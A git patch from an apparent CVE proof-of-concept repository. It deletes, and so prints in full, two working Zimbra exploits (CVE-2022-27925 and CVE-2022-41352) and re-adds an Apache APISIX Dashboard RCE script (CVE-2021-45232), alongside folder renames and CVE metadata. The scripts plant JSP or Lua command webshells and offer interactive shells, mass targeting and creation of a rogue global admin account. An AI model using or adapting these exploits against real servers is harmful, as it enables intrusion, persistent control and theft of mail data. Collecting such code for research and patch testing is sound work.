From 5603b129657b01a2bd393f24bda3f1e8feaf8b8b Mon Sep 17 00:00:00 2001 From: lastre3et Date: Mon, 8 May 2023 14:07:45 +0800 Subject: [PATCH] Update Repo Status --- cve/Zimbra/2022/CVE-2022-27925/exploit.py | 144 ----------- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ------------------ .../2021/cve-2021-45232/RedMe.md | 0 .../cve-2021-45232/apisix_dashboard_rce.py | 184 +++++++------- .../2021/yaml/cve-2021-45232.yaml} | 42 ++-- .../2022/cve-2022-24112/README.md | 0 .../2022/cve-2022-24112/apisix-exploit.py | 0 .../2022/yaml/CVE-2022-24112.yaml | 0 .../2020/CVE-2020-9490/README.md | 0 .../2020/CVE-2020-9490/apache_poc.py | 0 .../2020/yaml/CVE-2020-9490.yaml | 0 .../2021/CVE-2021-41773/README.md | 0 .../2021/CVE-2021-41773/exploit.py | 0 .../Pasted image 20220313024756.png | Bin .../Pasted image 20220313024903.png | Bin .../2021/CVE-2021-42013/PoC.sh | 0 .../2021/CVE-2021-42013/README.md | 0 .../2021/CVE-2021-42013/apache.png | Bin .../2021/yaml/CVE-2021-41773.yaml | 0 .../2021/yaml/CVE-2021-42013.yaml | 0 ...VE-2022-36946.yaml => CVE-2022-36946.yaml} | 34 +-- openkylin_list.yaml | 34 +-- other_list.yaml | 20 +- ...\346\264\236\346\250\241\347\211\210.yaml" | 10 +- 24 files changed, 161 insertions(+), 543 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-27925/exploit.py delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/RedMe.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/apisix_dashboard_rce.py (96%) rename cve/{Apache-APISIX/2021/yaml/ cve-2021-45232.yaml => apache-Apsix/2021/yaml/cve-2021-45232.yaml} (97%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/README.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/apisix-exploit.py (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/yaml/CVE-2022-24112.yaml (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/README.md (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/apache_poc.py (100%) rename cve/{apache => apache-Httpd}/2020/yaml/CVE-2020-9490.yaml (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/exploit.py (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/PoC.sh (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/apache.png (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-41773.yaml (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-42013.yaml (100%) rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946.yaml => CVE-2022-36946.yaml} (98%) diff --git a/cve/Zimbra/2022/CVE-2022-27925/exploit.py b/cve/Zimbra/2022/CVE-2022-27925/exploit.py deleted file mode 100644 index 3a952699..00000000 --- a/cve/Zimbra/2022/CVE-2022-27925/exploit.py +++ /dev/null @@ -1,144 +0,0 @@ -import argparse -import zipfile -import io -import random -import string -import requests -from urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%>
<%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "
");    Process p;    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));    }    else{        p = Runtime.getRuntime().exec(request.getParameter("cmd"));    }    OutputStream os = p.getOutputStream();    InputStream in = p.getInputStream();    DataInputStream dis = new DataInputStream(in);    String disr = dis.readLine();    while ( disr != null ) {    out.println(disr);    disr = dis.readLine();    }}%>
' -char_set = string.ascii_uppercase + string.digits -webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp' -#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"] -BLUE = "\033[1;34m" -CYAN = "\033[1;36m" -GREEN = "\033[0;32m" -RED = "\033[31m" - -ITERATE = False - - -def banner(): - return CYAN+''' - _____ _ __ -/__ / (_)___ ___ / /_ _________ _ - / / / / __ `__ \/ __ \/ ___/ __ `/ - / /__/ / / / / / / /_/ / / / /_/ / -/____/_/_/ /_/ /_/_.___/_/ \__,_/ - CVE-2022-27925 - ''' - -# FIX URL -def fix_url(url): - if not url.startswith('https://'): - url = 'https://' + url - url = url.rstrip("/") - return url - -def build_zip(jsp, path): - zip_buffer = io.BytesIO() - zf = zipfile.ZipFile(zip_buffer, 'w') - zf.writestr(path, jsp) - zf.close() - return zip_buffer.getvalue() - -def exploit(host, payload, cmd): - headers = {'content-Type': 'application/x-www-form-urlencoded'} - try: - r = requests.post( - host + '', data=payload, headers=headers, verify=False, timeout=20) - r = requests.post( - host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20) - print(GREEN + '[!] Testing webshell') - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=' + cmd, verify=False, timeout=20) - if "Josexv1" in r.text: - print(CYAN + '[+] Webshell works!!') - print(GREEN + '[+] WebShell location: ' + - host + '/zimbraAdmin/' + webshell_name + "") - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=uname+-a' , verify=False, timeout=20) - print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('
') - [1].split('
')[0].strip()) - return True - else: - print(RED + '[-] Target not vulnerable') - return False - except: - print(RED + '[!] Connection error') - -def ping_url(url): - try: - r = requests.get(url, verify=False, timeout=10) - if r.status_code == 200: - print(CYAN + '[!] Target is up!') - return True - else: - print(RED + '[!] Target is down! Next >> \n') - return False - except: - return False - -def main(url): - paths = [ - '../../../../mailboxd/webapps/zimbraAdmin/', - '../../../../jetty_base/webapps/zimbraAdmin/', - '../../../../jetty/webapps/zimbraAdmin/'] - work = 0 - try: - for num in range(0, 3): - print( - GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num]) - zippedfile = build_zip(webshell_payload, paths[num]+webshell_name) - print(GREEN + '[!] Exploiting!') - if exploit(url, zippedfile, 'echo "Josexv1"'): - if args.target: - answer = input( - CYAN + '[+] Want to interact with webshell via terminal? (y/n): ') - if answer == "y": - print(GREEN + '[!] Sending commands to: ' + - url + '/zimbraAdmin/' + webshell_name) - while True: - cmd = input(GREEN + "[+] $ > " + BLUE) - if cmd == "exit": - break - req = requests.get( - url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20) - try: - print(CYAN + req.text.split('
') - [1].split('
')[0].strip()) - except: - print(RED + "[!] Error ?") - else: - print(RED + '[!] Bye!') - exit() - except: - print(RED + '[!] URL Error') - ITERATE = True - -if __name__ == "__main__": - print(banner()) - parser = argparse.ArgumentParser() - parser.add_argument( - '-t', '--target', help='URl with protocol HTTPS', default=False) - parser.add_argument("-l", "--list", action="store", - help="List of targets", default=False) - args = parser.parse_args() - if args.target is not False: - url = fix_url(args.target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - elif args.list is not False: - with open(args.list, "rb") as targets: - for target in targets: - target = target.rstrip().decode("utf-8") - url = fix_url(target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - else: - parser.print_help() - parser.exit() diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py deleted file mode 100644 index d440f7e6..00000000 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - - - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md similarity index 100% rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py similarity index 96% rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py index edd12c9f..30ebcda5 100644 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py @@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + "/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + "/" + uri) + else: print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml similarity index 97% rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml index ad102017..3041c776 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-45232 -source: https://github.com/wuppp/cve-2021-45232-exp -info: - name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 - severity: CRITICAL - description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 - scope-of-influence: - In Apache APISIX Dashboard before 2.10.1 - reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - - https://seclists.org/oss-sec/2021/q4/180 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - cnvd-id: None - kve-id: None +id: CVE-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + In Apache APISIX Dashboard before 2.10.1 + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None tags: cve2021 \ No newline at end of file diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md rename to cve/apache-Apsix/2022/cve-2022-24112/README.md diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml similarity index 100% rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md similarity index 100% rename from cve/apache/2020/CVE-2020-9490/README.md rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py similarity index 100% rename from cve/apache/2020/CVE-2020-9490/apache_poc.py rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml similarity index 100% rename from cve/apache/2020/yaml/CVE-2020-9490.yaml rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-41773/README.md rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py similarity index 100% rename from cve/apache/2021/CVE-2021-41773/exploit.py rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh similarity index 100% rename from cve/apache/2021/CVE-2021-42013/PoC.sh rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-42013/README.md rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png similarity index 100% rename from cve/apache/2021/CVE-2021-42013/apache.png rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-42013.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 98% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd6..2c0bf1f0 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml @@ -1,18 +1,18 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: 高危 + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 tags: 拒绝服务,cve2022 \ No newline at end of file diff --git 